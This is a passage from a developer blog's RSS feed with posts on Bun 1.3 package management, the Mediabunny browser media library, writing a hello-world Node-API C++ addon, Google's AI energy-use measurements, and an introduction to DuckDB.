<li><p><strong>Bun 1.3's Solution</strong>: The even faster bun install directly addresses this pain point. When you run bun install at the root of your monorepo, it's designed to be incredibly efficient at resolving and linking all those dependencies across multiple workspaces.</p>
</li>
</ul>
<p>This means <strong>quicker setup</strong>: new developers joining the project, and CI/CD pipelines, get up and running much faster. It also means <strong>faster dependency changes</strong>: adding or updating a dependency in one package won't bring your entire monorepo workflow to a crawl.</p>
<h3 id="heading-bimproved-nodejs-compatibility">b. <strong>Improved Node.js Compatibility</strong></h3>
<ul>
<li><p><strong>Monorepo Tools often Rely on Node.js</strong>: Many existing monorepo management tools (like Lerna, Turborepo, Nx, or even simple custom scripts) are built on Node.js.</p>
</li>
<li><p><strong>Bun's Benefit</strong>: As Bun's Node.js compatibility improves with 1.3, it means that these tools (or your own Node.js-based scripts within the monorepo) are more likely to run seamlessly with Bun as the underlying runtime. You can leverage Bun's speed for script execution across your workspaces without hitting compatibility walls.</p>
</li>
</ul>
<h3 id="heading-c-built-in-typescript-and-jsx-support">c. <strong>Built-in TypeScript and JSX Support</strong></h3>
<ul>
<li><p><strong>Common in Monorepos</strong>: It's very common for different packages within a monorepo to use TypeScript, React (JSX), or both.</p>
</li>
<li><p><strong>Bun's Advantage</strong>: Bun's native support means you don't need complex tsconfig.json setups or extra transpilers (like Babel or ts-node) for each package just to get things running or test them. Bun can execute your TypeScript and JSX files directly, simplifying the development experience across your monorepo's packages.</p>
</li>
</ul>
<h2 id="heading-7package-management">7.Package Management</h2>
<p>Bun's package manager gets more powerful with isolated installs, interactive updates, and dependency catalogs.</p>
<h3 id="heading-a-catalogs-synchronization">a. Catalogs Synchronization</h3>
<p>Bun 1.3 makes it easier to work with monorepos.</p>
<p>Bun centralizes version management across monorepo packages with dependency <code>catalogs</code>. Define versions once in your root package.json and reference them in workspace packages.</p>
<pre><code class="lang-json">{
  <span class="hljs-string">"name"</span>: <span class="hljs-string">"monorepo"</span>,
  <span class="hljs-string">"workspaces"</span>: [<span class="hljs-string">"packages/*"</span>],
  <span class="hljs-string">"catalog"</span>: {
    <span class="hljs-string">"react"</span>: <span class="hljs-string">"^18.0.0"</span>,
    <span class="hljs-string">"typescript"</span>: <span class="hljs-string">"^5.0.0"</span>
  }
}
</code></pre>
<p>Reference catalog versions in workspace packages:</p>
<pre><code class="lang-json">{
  <span class="hljs-string">"name"</span>: <span class="hljs-string">"@company/ui"</span>,
  <span class="hljs-string">"dependencies"</span>: {
    <span class="hljs-string">"react"</span>: <span class="hljs-string">"catalog:"</span>
  }
}
</code></pre>
<h3 id="heading-b-isolated-installs-are-now-default-for-workspaces">b. Isolated installs are now default for workspaces</h3>
<p>Bun 1.3 introduces isolated installs. This prevents packages from accessing dependencies they don't declare in their package.json. Unlike hoisted installs (npm/Yarn's flat structure where all dependencies live in a single node_modules), isolated installs ensure each package only has access to its own declared dependencies.</p>
<p>And if you use "<strong>workspaces</strong>" in your package.json, isolated installs are the default.</p>
<p>To opt out, use either of the following:</p>
<pre><code class="lang-bash">bun install --linker=hoisted
</code></pre>
<p>or set it in bunfig.toml:</p>
<pre><code class="lang-toml">[install]
linker = <span class="hljs-string">"hoisted"</span>
</code></pre>
<h3 id="heading-c-new-commands">c. New Commands</h3>
<p>Bun 1.3 adds several commands that make package management easier:</p>
<ol>
<li><p><code>bun why</code> - explains why a package is installed</p>
</li>
<li><p><code>bun update --interactive</code> - lets you choose which dependencies to update</p>
</li>
<li><p><code>bun info</code> - lets you view package metadata</p>
</li>
<li><p><code>bun install --analyze</code> - scans your code for imports that aren't in package.json and installs them</p>
</li>
<li><p><code>bun audit</code> - scans dependencies for known vulnerabilities, using the same database as npm audit</p>
</li>
</ol>
<h2 id="heading-8explore-more-about-bun">8.Explore more about Bun</h2>
<ul>
<li><p>Want to dive deeper into what's new in Bun 1.3? Take a look at the official Bun release notes - <a target="_blank" href="https://bun.com/blog/bun-v1.3">https://bun.com/blog/bun-v1.3</a></p>
</li>
<li><p>Bun - <a target="_blank" href="https://bun.com/">https://bun.com/</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Mediabunny - Mediatoolkit for Modern Web]]></title><description><![CDATA[In today's fast-paced digital world, rich media—video and audio—is everywhere. From social media feeds to educational platforms, e-commerce, and entertainment, the ability to effectively handle media files directly within the browser has become not j...]]></description><link>https://blog.nidhin.dev/mediabunny-mediatoolkit-for-modern-web</link><guid isPermaLink="true">https://blog.nidhin.dev/mediabunny-mediatoolkit-for-modern-web</guid><category><![CDATA[#Mediabunny]]></category><category><![CDATA[#WebCodecs ]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[TypeScript]]></category><category><![CDATA[Open Source]]></category><category><![CDATA[video]]></category><category><![CDATA[audio]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Fri, 26 Sep 2025 17:52:16 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1758908821947/9b3958d0-bf36-42bb-97aa-d98dcdcf1328.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In today's fast-paced digital world, rich media—video and audio—is everywhere. From social media feeds to educational platforms, e-commerce, and entertainment, the ability to effectively handle media files directly within the browser has become not just a luxury, but a necessity for building truly dynamic and responsive web applications.</p>
<p>Enter Mediabunny, a brand-new, open-source JavaScript library designed to be a complete toolkit for high-performance media operations on the web.</p>
<h3 id="heading-why-mediabunny-the-need-for-in-browser-media-power"><strong>Why Mediabunny? The Need for In-Browser Media Power</strong></h3>
<p>For years, developers have relied on server-side solutions like <a target="_blank" href="https://ffmpeg.org/"><strong>FFmpeg</strong></a> for robust media processing tasks such as converting, encoding, and manipulating video and audio files. While incredibly powerful, these solutions often introduce latency, increase server load, and can be complex to integrate.</p>
<p>Mediabunny changes this paradigm. Its vision was to create an "<strong>FFmpeg for the web</strong>": a pure TypeScript library built from scratch, optimized for browser environments, and leveraging modern web APIs like WebCodecs to unlock unparalleled speed and efficiency.</p>
<p>The goal is simple: empower developers to perform complex media operations directly in the user's browser, faster than anybunny else!</p>
<h3 id="heading-key-features-that-set-mediabunny-apart"><strong>Key Features that Set Mediabunny apart</strong></h3>
<p>Mediabunny isn't just another media library: it's a comprehensive suite of tools engineered for precision and performance.</p>
<ol>
<li><p><strong>Wide Format Support</strong>: Handle a vast array of media types with ease. Mediabunny can read and write popular formats including MP4, MOV, WebM, MKV, WAVE, MP3, Ogg, ADTS, and FLAC.</p>
</li>
<li><p><strong>Built-in Encoding &amp; Decoding</strong>: Forget server roundtrips. Mediabunny supports over 25 video, audio, and subtitle codecs, leveraging the browser's native hardware acceleration through the WebCodecs API for lightning-fast processing.</p>
</li>
<li><p><strong>High Precision Operations</strong>: Need microsecond-accurate trimming or frame extraction? Mediabunny provides fine-grained control for all reading and writing operations.</p>
</li>
<li><p><strong>Powerful Conversion API</strong>: The easy-to-use conversion API offers a wealth of features, including:</p>
</li>
</ol>
<ul>
<li><p><strong>Transmuxing &amp; Transcoding</strong>: Change container formats or codecs efficiently.</p>
</li>
<li><p><strong>Resizing &amp; Cropping</strong>: Adjust video dimensions and focus.</p>
</li>
<li><p><strong>Rotation</strong>: Correct video orientation.</p>
</li>
<li><p><strong>Resampling</strong>: Modify audio sample rates.</p>
</li>
<li><p><strong>Trimming</strong>: Cut video and audio segments with precision.</p>
</li>
</ul>
<h3 id="heading-other-features"><strong>Other Features</strong></h3>
<ol>
<li><p><strong>Streaming I/O</strong>: Memory efficiency is crucial for large files. Mediabunny handles reading and writing files of virtually any size using memory-efficient streaming, preventing browser slowdowns.</p>
</li>
<li><p><strong>Extremely Tree-shakable</strong>: Mediabunny is designed so you only include the features you actually use, leading to incredibly small final bundle sizes (as small as 5 kB gzipped!).</p>
</li>
<li><p><strong>Zero Dependencies</strong>: To ensure maximum performance and minimal overhead, Mediabunny is implemented entirely in highly performant TypeScript, with absolutely zero external dependencies.</p>
</li>
<li><p><strong>Cross-Platform Compatibility</strong>: Whether you're building for web browsers or backend Node.js applications, Mediabunny works seamlessly across both environments.</p>
</li>
</ol>
<h2 id="heading-installation"><strong>Installation</strong></h2>
<p>Install it via npm using the following command</p>
<pre><code class="lang-bash">  npm install mediabunny
</code></pre>
<p>Alternatively, include it directly with a script tag using one of the builds. Doing so exposes a global Mediabunny object.</p>
<pre><code class="lang-bash">  &lt;script src=<span class="hljs-string">"mediabunny.cjs"</span>&gt;&lt;/script&gt;
</code></pre>
<h3 id="heading-convert-files"><strong>Convert files</strong></h3>
<p>Let's look at some sample code showing how to convert a file:</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">import</span> { Input, Output, Conversion, ALL_FORMATS, BlobSource, WebMOutputFormat } <span class="hljs-keyword">from</span> <span class="hljs-string">'mediabunny'</span>;

<span class="hljs-comment">// "file" is assumed to be a File or Blob, e.g. from an &lt;input type="file"&gt; element</span>
<span class="hljs-keyword">const</span> input = <span class="hljs-keyword">new</span> Input({
    <span class="hljs-attr">source</span>: <span class="hljs-keyword">new</span> BlobSource(file),
    <span class="hljs-attr">formats</span>: ALL_FORMATS,
});

<span class="hljs-keyword">const</span> output = <span class="hljs-keyword">new</span> Output({
    <span class="hljs-attr">format</span>: <span class="hljs-keyword">new</span> WebMOutputFormat(), <span class="hljs-comment">// Convert to WebM</span>
    <span class="hljs-attr">target</span>: <span class="hljs-keyword">new</span> BufferTarget(),
});

<span class="hljs-keyword">const</span> conversion = <span class="hljs-keyword">await</span> Conversion.init({ input, output });
<span class="hljs-keyword">await</span> conversion.execute();
</code></pre>
<h2 id="heading-open-source-and-community-driven"><strong>Open Source and Community-Driven</strong></h2>
<p>Mediabunny is an open-source project released under the MPL-2.0 license. This means it's completely free to use for any purpose, including closed-source commercial applications.</p>
<p>With Mediabunny, developers can now build richer, more interactive, and performant web applications that handle media files like never before. Imagine in-browser video editors, audio transcoders, or advanced media analysis tools – all running client-side, delivering an instantaneous user experience.</p>
<h2 id="heading-know-more-about-mediabunny"><strong>Know more about Mediabunny</strong></h2>
<ul>
<li><p>Website: <a target="_blank" href="https://mediabunny.dev/"><strong>https://mediabunny.dev/</strong></a></p>
</li>
<li><p>Github: <a target="_blank" href="https://github.com/Vanilagy/mediabunny"><strong>https://github.com/Vanilagy/mediabunny</strong></a></p>
</li>
<li><p>Docs: <a target="_blank" href="https://mediabunny.dev/guide/introduction"><strong>https://mediabunny.dev/guide/introduction</strong></a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Unlocking Native Performance in Node.js with Node-API (N-API)]]></title><description><![CDATA[Node.js is fast, flexible, and great for building APIs, servers, and full-stack apps. But sometimes JavaScript isn’t enough.

What if you need blazing-fast performance?

Or you want to use an existing C/C++ library instead of rewriting it in JS?

Or ...]]></description><link>https://blog.nidhin.dev/unlocking-native-performance-in-nodejs-with-node-api-n-api</link><guid isPermaLink="true">https://blog.nidhin.dev/unlocking-native-performance-in-nodejs-with-node-api-n-api</guid><category><![CDATA[#Nodeapi]]></category><category><![CDATA[Node.js]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[Web Development]]></category><category><![CDATA[Node.js API]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 13 Sep 2025 18:25:59 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1757787826166/ca5e0307-f1bd-4002-aa1b-3436509bed14.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Node.js is fast, flexible, and great for building APIs, servers, and full-stack apps. But sometimes JavaScript isn’t enough.</p>
<ul>
<li><p>What if you need <strong>blazing-fast performance</strong>?</p>
</li>
<li><p>Or you want to use an existing <strong>C/C++ library</strong> instead of rewriting it in JS?</p>
</li>
<li><p>Or maybe you need access to <strong>low-level system features</strong> like file systems, drivers, or hardware?</p>
</li>
</ul>
<p>That’s where <strong>Node-API (N-API)</strong> comes in.</p>
<h2 id="heading-1what-is-node-api-n-api"><strong>1.What is Node-API (N-API)?</strong></h2>
<p><strong>Node-API</strong> is a <strong>stable C API</strong> for building <strong>native addons</strong> in Node.js.</p>
<p>Before Node-API, addons were tied directly to V8 (Node’s JavaScript engine). Every Node.js or V8 update risked breaking your addon.</p>
<p>With Node-API:</p>
<ul>
<li><p>Addons work across Node.js versions.</p>
</li>
<li><p>It’s <strong>engine-independent</strong> (works with V8, ChakraCore, Hermes, etc.).</p>
</li>
<li><p>It provides a <strong>stable ABI</strong> (Application Binary Interface).</p>
</li>
</ul>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Node-API is the <strong>bridge</strong> between JavaScript and native code.</div>
</div>

<h2 id="heading-2why-should-you-want-n-api"><strong>2.Why Should You Want N-API?</strong></h2>
<ul>
<li><p><strong>Future-proof</strong> - Your addon won’t break every time Node.js upgrades.</p>
</li>
<li><p><strong>Performance</strong> - Run CPU-heavy tasks in native code.</p>
</li>
<li><p><strong>Reuse existing libraries</strong> - Wrap C/C++ instead of reinventing in JS.</p>
</li>
<li><p><strong>System access</strong> - Do things pure JS can’t (hardware, OS integration).</p>
</li>
</ul>
<p>Popular modules that use native code:</p>
<ul>
<li><p><strong>bcrypt</strong> → password hashing</p>
</li>
<li><p><strong>sharp</strong> → image processing</p>
</li>
<li><p><strong>sqlite3</strong> → database driver</p>
</li>
</ul>
<h2 id="heading-3how-node-api-works"><strong>3.How Node-API Works?</strong></h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1757778047784/3805fc4c-57b6-49bc-8c3f-a9f7c449abb9.png" alt class="image--center mx-auto" /></p>
<p>JavaScript talks to Node-API, which safely communicates with your C/C++ addon.</p>
<h2 id="heading-4lets-build-a-tiny-addon">4.Let’s build a tiny addon</h2>
<p>Let's get our hands dirty by building a tiny addon.</p>
<h3 id="heading-step-1-prerequisites">Step 1: Prerequisites</h3>
<p>Make sure you have:</p>
<ul>
<li><p>Node.js</p>
</li>
<li><p>Python (for build tools)</p>
</li>
<li><p>C++ compiler (gcc/clang/MSVC)</p>
</li>
</ul>
<pre><code class="lang-bash">npm install -g node-gyp
# node-addon-api provides the napi.h C++ wrapper header used by the addon
npm install node-addon-api
</code></pre>
<h3 id="heading-step-2-addon-code-c">Step 2: Addon Code (C++)</h3>
<p>Create a new file named hello.cpp</p>
<pre><code class="lang-cpp"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;napi.h&gt;</span></span>

<span class="hljs-comment">// This is the native C++ function that will be exposed to JavaScript.</span>
<span class="hljs-comment">// It takes the standard N-API CallbackInfo object and returns a Napi::Value.</span>
<span class="hljs-function">Napi::Value <span class="hljs-title">HelloWorld</span><span class="hljs-params">(<span class="hljs-keyword">const</span> Napi::CallbackInfo&amp; info)</span> </span>{
  <span class="hljs-comment">// Napi::Env is the environment context for the current Node.js instance.</span>
  <span class="hljs-comment">// It's used to create JavaScript values (strings, numbers, objects, etc.).</span>
  Napi::Env env = info.Env();

  <span class="hljs-comment">// Create a new JavaScript string with the value "Hello World from C++!"</span>
  <span class="hljs-comment">// and return it. This value will be the result of calling the function</span>
  <span class="hljs-comment">// from your Node.js code.</span>
  <span class="hljs-keyword">return</span> Napi::String::New(env, <span class="hljs-string">"Hello World from C++!"</span>);
}

<span class="hljs-comment">// The Init function is the entry point for the Node.js addon.</span>
<span class="hljs-comment">// It's responsible for setting up the exports that will be available</span>
<span class="hljs-comment">// in JavaScript when the addon is required.</span>
<span class="hljs-function">Napi::Object <span class="hljs-title">Init</span><span class="hljs-params">(Napi::Env env, Napi::Object exports)</span> </span>{
  <span class="hljs-comment">// Set a property on the 'exports' object.</span>
  <span class="hljs-comment">// The first argument is the name of the export (how you'll call it in JS).</span>
  <span class="hljs-comment">// The second argument is a Napi::Function that wraps our native C++ function.</span>
  exports.Set(Napi::String::New(env, <span class="hljs-string">"hello"</span>),
              Napi::Function::New(env, HelloWorld));

  <span class="hljs-comment">// Return the modified exports object.</span>
  <span class="hljs-keyword">return</span> exports;
}

<span class="hljs-comment">// This macro registers the addon with Node.js.</span>
<span class="hljs-comment">// The first argument is the addon's name (must match 'target_name' in binding.gyp).</span>
<span class="hljs-comment">// The second argument is the initialization function we just defined.</span>
NODE_API_MODULE(hello_world_addon, Init)
</code></pre>
<p>This is the core C++ source code. It defines the HelloWorld function that returns a string and an Init function that exports HelloWorld under the name hello.</p>
<h3 id="heading-step-3-build-config">Step 3: Build Config</h3>
<p>Create binding.gyp</p>
<pre><code class="lang-json">{
<span class="hljs-attr">"targets"</span>: [
  {
    <span class="hljs-attr">"target_name"</span>: <span class="hljs-string">"hello_world_addon"</span>,
    <span class="hljs-attr">"sources"</span>: [ <span class="hljs-string">"hello.cpp"</span> ],
    <span class="hljs-attr">"include_dirs"</span>: [
       <span class="hljs-string">"&lt;!@(node -p \"require('node-addon-api').include\")"</span>
     ],
     <span class="hljs-attr">"defines"</span>: [ <span class="hljs-string">"NAPI_DISABLE_CPP_EXCEPTIONS"</span> ]
   }
 ]
}
</code></pre>
<p>This is a build configuration file for node-gyp. It tells the compiler which C++ files to compile (sources), what to name the final binary (target_name), and where to find the necessary header files (include_dirs).</p>
<h3 id="heading-step-4-build-the-addon">Step 4: Build the Addon</h3>
<pre><code class="lang-bash">node-gyp configure build
</code></pre>
<p>This generates <code>build/Release/hello_world_addon.node</code> (the file name comes from <code>target_name</code> in binding.gyp)</p>
<h3 id="heading-step-5-use-it-in-nodejs">Step 5: Use It in Node.js</h3>
<p>Create index.js</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">const</span> addon = <span class="hljs-built_in">require</span>(<span class="hljs-string">'./build/Release/hello_world_addon.node'</span>);

<span class="hljs-built_in">console</span>.log(addon.hello()); <span class="hljs-comment">// → "Hello World from C++!"</span>
</code></pre>
<p>Run it:</p>
<pre><code class="lang-bash">node index.js
</code></pre>
<p>You can find the entire source code for the hello-world addon in the following GitHub repository:</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://github.com/nidhinkumar06/N-API-Example">https://github.com/nidhinkumar06/N-API-Example</a></div>
<h2 id="heading-5how-n-api-differs-from-worklets-or-webassembly">5.How N-API differs from Worklets or WebAssembly?</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1757783959208/3d07d722-31b3-4de3-a410-a3dbe88c9350.png" alt class="image--center mx-auto" /></p>
<ul>
<li><p><strong>Node-API</strong> → bridge to native C++ in Node.js.</p>
</li>
<li><p><strong>Worklets</strong> → lightweight JS workers in browser rendering.</p>
</li>
<li><p><strong>WebAssembly</strong> → portable, high-performance modules for both browser + Node.js.</p>
</li>
</ul>
<h2 id="heading-6node-api-and-hermes">6.Node-API and Hermes</h2>
<p><strong>Hermes</strong> is a JavaScript engine built by Meta for React Native. It's optimized for:</p>
<ul>
<li><p>Fast startup</p>
</li>
<li><p>Low memory usage</p>
</li>
<li><p>Small binary size</p>
</li>
</ul>
<p>Node.js usually runs on <strong>V8</strong>, but the community has experimented with <strong>running Node.js on Hermes</strong>.</p>
<p>Here’s why Node-API is important:</p>
<ul>
<li><p>Node-API is <strong>engine-independent</strong>.</p>
</li>
<li><p>If Node.js runs on V8, ChakraCore, or Hermes, your addon still works.</p>
</li>
<li><p>Without Node-API, you’d have to rewrite bindings for every engine.</p>
</li>
</ul>
<h3 id="heading-example">Example</h3>
<p>Think of <strong>Node-API</strong> as a <strong>universal power adapter</strong>:</p>
<ul>
<li><p>V8 = US plug</p>
</li>
<li><p>Hermes = EU plug</p>
</li>
<li><p>ChakraCore = UK plug</p>
</li>
</ul>
<p>Without Node-API, you’d need a different charger each time. With Node-API, your addon plugs in anywhere.</p>
<h2 id="heading-7resources-amp-links">7.Resources &amp; Links</h2>
<h3 id="heading-node-api"><strong>Node-API</strong></h3>
<ul>
<li><p>Documentation: <a target="_blank" href="https://nodejs.org/api/n-api.html">https://nodejs.org/api/n-api.html</a></p>
</li>
<li><p>Examples: <a target="_blank" href="https://github.com/nodejs/node-addon-examples">https://github.com/nodejs/node-addon-examples</a></p>
</li>
</ul>
<h3 id="heading-node-api-bindings"><strong>Node-API bindings</strong></h3>
<ul>
<li><p>Engine bindings doc: <a target="_blank" href="https://github.com/nodejs/abi-stable-node/blob/doc/node-api-engine-bindings.md">https://github.com/nodejs/abi-stable-node/blob/doc/node-api-engine-bindings.md</a></p>
</li>
<li><p>C++ API: <a target="_blank" href="https://github.com/nodejs/node-addon-api">https://github.com/nodejs/node-addon-api</a></p>
</li>
<li><p>C# API: <a target="_blank" href="https://github.com/microsoft/node-api-dotnet">https://github.com/microsoft/node-api-dotnet</a></p>
</li>
<li><p>JSI API: <a target="_blank" href="https://github.com/microsoft/node-api-jsi">https://github.com/microsoft/node-api-jsi</a></p>
</li>
</ul>
<h3 id="heading-node-api-for-hermes"><strong>Node-API for Hermes</strong></h3>
<ul>
<li><p>Hermes PR: <a target="_blank" href="https://github.com/facebook/hermes/pull/1377">https://github.com/facebook/hermes/pull/1377</a></p>
</li>
<li><p>Hermes Windows fork: <a target="_blank" href="https://github.com/microsoft/hermes-windows">https://github.com/microsoft/hermes-windows</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[The Carbon Cost of AI: How Google Measures Its Energy Use]]></title><description><![CDATA[Google’s Sustainability team recently released a technical paper explaining how it measures the environmental footprint of AI inference — the stage where trained AI models generate text, images, or predictions. While AI has the potential to drive mas...]]></description><link>https://blog.nidhin.dev/the-carbon-cost-of-ai-how-google-measures-its-energy-use</link><guid isPermaLink="true">https://blog.nidhin.dev/the-carbon-cost-of-ai-how-google-measures-its-energy-use</guid><category><![CDATA[AI]]></category><category><![CDATA[Artificial Intelligence]]></category><category><![CDATA[sustainability]]></category><category><![CDATA[Google AI]]></category><category><![CDATA[carbon footprint]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Fri, 22 Aug 2025 19:07:56 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1755888325935/1e620257-a82c-49b0-9d15-8c9814322f48.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Google’s Sustainability team recently released a technical paper explaining how it measures the environmental footprint of AI inference — the stage where trained AI models generate text, images, or predictions. While AI has the potential to drive massive economic and scientific progress, its growing energy demands raise important questions about sustainability.</p>
<h3 id="heading-how-much-energy-does-an-ai-prompt-use">How Much Energy Does an AI Prompt Use?</h3>
<p>According to Google's analysis, a typical Gemini text prompt consumes about <strong>0.24 watt-hours of energy</strong>, produces <strong>0.03 grams of carbon dioxide equivalent (CO2e) emissions</strong>, and uses <strong>0.26 milliliters of water</strong> — roughly equivalent to watching TV for less than nine seconds.</p>
<p>Interestingly, over just 12 months, the energy and carbon footprint of a Gemini text prompt have dropped by <strong>33x and 44x</strong> respectively, thanks to advancements in model efficiency, hardware, and data center performance.</p>
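<p>A quick back-of-the-envelope check makes the TV comparison concrete. Note that the 100 W television draw below is an assumed round figure chosen purely for illustration; only the 0.24 Wh number comes from the paper:</p>

```javascript
// Sanity-check the "watching TV for less than nine seconds" comparison.
// promptWh comes from Google's paper; tvWatts is an assumed round figure.
const promptWh = 0.24; // energy per Gemini text prompt, in watt-hours
const tvWatts = 100;   // assumed television power draw, in watts

// hours of TV = Wh / W; multiply by 3600 to convert to seconds
const tvSeconds = (promptWh / tvWatts) * 3600;
console.log(tvSeconds.toFixed(1)); // "8.6", i.e. under nine seconds

// A 33x efficiency gain implies the same prompt cost roughly
// 0.24 * 33 = 7.92 Wh about a year earlier.
const yearAgoWh = promptWh * 33;
console.log(yearAgoWh.toFixed(2)); // "7.92"
```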
<h3 id="heading-why-measuring-ais-footprint-is-complex">Why Measuring AI’s Footprint Is Complex</h3>
<p>Google emphasizes that measuring AI’s environmental cost isn’t as simple as looking at active chip usage. A full picture needs to include:</p>
<ul>
<li><p><strong>Idle capacity</strong> kept ready for reliability and traffic spikes.</p>
</li>
<li><p><strong>CPU and RAM usage</strong>, which support model execution.</p>
</li>
<li><p><strong>Data center overhead</strong>, such as cooling and power distribution.</p>
</li>
<li><p><strong>Water consumption</strong> for cooling systems.</p>
</li>
</ul>
<p>Many estimates in the public domain focus only on GPU/TPU consumption, which Google says can underestimate the true footprint by more than half.</p>
<h3 id="heading-efficiency-through-a-full-stack-approach">Efficiency Through a Full-Stack Approach</h3>
<p>Google attributes its efficiency gains to a <em>full-stack strategy</em> — improving AI across every layer, from hardware to algorithms to data centers. Key contributors include:</p>
<ul>
<li><p><strong>Smarter model architectures</strong> like <a target="_blank" href="https://arxiv.org/abs/1701.06538">Mixture-of-Experts</a>, which only activate parts of a model needed for a task.</p>
</li>
<li><p><strong>Algorithmic improvements</strong> such as quantization, reducing energy use without sacrificing accuracy.</p>
</li>
<li><p><strong>Optimized serving methods</strong> like speculative decoding and <a target="_blank" href="https://arxiv.org/abs/1503.02531">distilled models</a> (e.g., Gemini Flash) that handle queries with fewer computations.</p>
</li>
<li><p><strong>Custom TPUs</strong> designed for maximum performance per watt, now 30x more efficient than the first generation.</p>
</li>
<li><p><strong>Ultra-efficient data centers</strong> running at a fleet-wide average <a target="_blank" href="https://datacenters.google/efficiency/">PUE (Power Usage Effectiveness) of 1.09</a>, powered increasingly by carbon-free energy.</p>
</li>
</ul>
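<p>To unpack what a PUE of 1.09 means in practice, here is a small illustrative calculation (the 1,000 kWh IT load is an arbitrary example figure, not a Google number):</p>

```javascript
// PUE (Power Usage Effectiveness) = total facility energy / IT equipment energy.
// A PUE of 1.0 would mean every watt goes to the servers; 1.09 means only
// about 9% extra is spent on cooling, power distribution, and other overhead.
const pue = 1.09;
const itEnergyKWh = 1000;                       // assumed energy consumed by servers
const totalKWh = Math.round(itEnergyKWh * pue); // energy drawn by the whole facility
const overheadKWh = totalKWh - itEnergyKWh;     // cooling, distribution, etc.

console.log(totalKWh);    // 1090
console.log(overheadKWh); // 90
```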
<h3 id="heading-google-2025-environment-report">Google 2025 Environment Report</h3>
<p>Based on Google's 2025 Environmental Report, the carbon emitted by Google's data centers in 2024 was approximately <strong>2.5 million metric tons of carbon dioxide equivalent (tCO2e).</strong></p>
<p>For broader context, Google's total operational emissions (which include all Scope 1 and Scope 2 market-based emissions for all Google and Alphabet Inc. operations, including offices, not just data centers) for 2024 were <strong>3,132,200 tCO2e</strong>.</p>
<p>To know more, read the full environmental report - <a target="_blank" href="https://www.gstatic.com/gumdrop/sustainability/google-2025-environmental-report.pdf">https://www.gstatic.com/gumdrop/sustainability/google-2025-environmental-report.pdf</a></p>
<h3 id="heading-looking-ahead">Looking Ahead</h3>
<p>Google acknowledges that the job isn’t done. It continues to push for further efficiency improvements while pursuing its broader goals of 24/7 carbon-free operations and water replenishment. By publishing its methodology, Google hopes to set a standard for how the industry measures the true environmental footprint of AI.</p>
<blockquote>
<p>As we build more powerful AI, we must remember the planet isn’t ours alone.</p>
</blockquote>
<h3 id="heading-reference-links">Reference Links</h3>
<ol>
<li><p>Research Paper - <a target="_blank" href="https://arxiv.org/abs/2508.15734">https://arxiv.org/abs/2508.15734</a></p>
</li>
<li><p>Distilling the Knowledge in a Neural Network - <a target="_blank" href="https://arxiv.org/abs/1503.02531">https://arxiv.org/abs/1503.02531</a></p>
</li>
<li><p>2025 Environmental Report - <a target="_blank" href="https://www.gstatic.com/gumdrop/sustainability/google-2025-environmental-report.pdf">https://www.gstatic.com/gumdrop/sustainability/google-2025-environmental-report.pdf</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[DuckDB]]></title><description><![CDATA[DuckDB is an in-process, analytical database management system (DBMS) designed for Online Analytical Processing (OLAP) workloads. It is built to handle large datasets and complex queries quickly, focusing on data analysis and reporting. It is designed to...]]></description><link>https://blog.nidhin.dev/duckdb</link><guid isPermaLink="true">https://blog.nidhin.dev/duckdb</guid><category><![CDATA[duckDB]]></category><category><![CDATA[Databases]]></category><category><![CDATA[DBMS]]></category><category><![CDATA[columnar dbs]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Fri, 15 Aug 2025 17:56:48 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1755280470738/d1e8a09b-dc64-4e0d-8616-d44fabf4eae0.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>DuckDB is an in-process, analytical database management system (DBMS) designed for Online Analytical Processing (OLAP) workloads. It is built to handle large datasets and complex queries quickly, focusing on data analysis and reporting. It is designed to be embedded directly into the application, much like SQLite.</p>
<h2 id="heading-key-features-and-characteristics">Key Features and Characteristics</h2>
<h2 id="heading-1-in-process-execution">1. In-Process Execution</h2>
<p>Like SQLite, DuckDB doesn’t require a separate server process. It runs within the same process as your application, making it easy to deploy and use without complex server setups.</p>
<h2 id="heading-2-columnar-storage">2. Columnar Storage</h2>
<p>DuckDB uses a columnar storage format. This means data is stored column-by-column rather than row-by-row, a significant advantage for analytical queries because the database reads only the columns a query needs, leading to faster performance, especially when aggregating or filtering on a few columns within very wide tables.</p>
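<p>The difference can be sketched in plain TypeScript (an illustrative model, not DuckDB's actual storage engine): a row store keeps whole records together, while a column store keeps each column contiguous, so an aggregate over one column never touches the others.</p>

```typescript
// Row-oriented layout: each record is stored together.
const rowStore = [
  { id: 1, name: "Alice", amount: 120 },
  { id: 2, name: "Bob", amount: 80 },
  { id: 3, name: "Carol", amount: 200 },
];

// Column-oriented layout: each column is a contiguous array.
const columnStore = {
  id: [1, 2, 3],
  name: ["Alice", "Bob", "Carol"],
  amount: [120, 80, 200],
};

// SUM(amount) over the row store walks every full record...
const rowSum = rowStore.reduce((acc, row) => acc + row.amount, 0);

// ...while the column store scans only the `amount` array,
// never touching `id` or `name`.
const colSum = columnStore.amount.reduce((acc, v) => acc + v, 0);

console.log(rowSum, colSum); // 400 400
```

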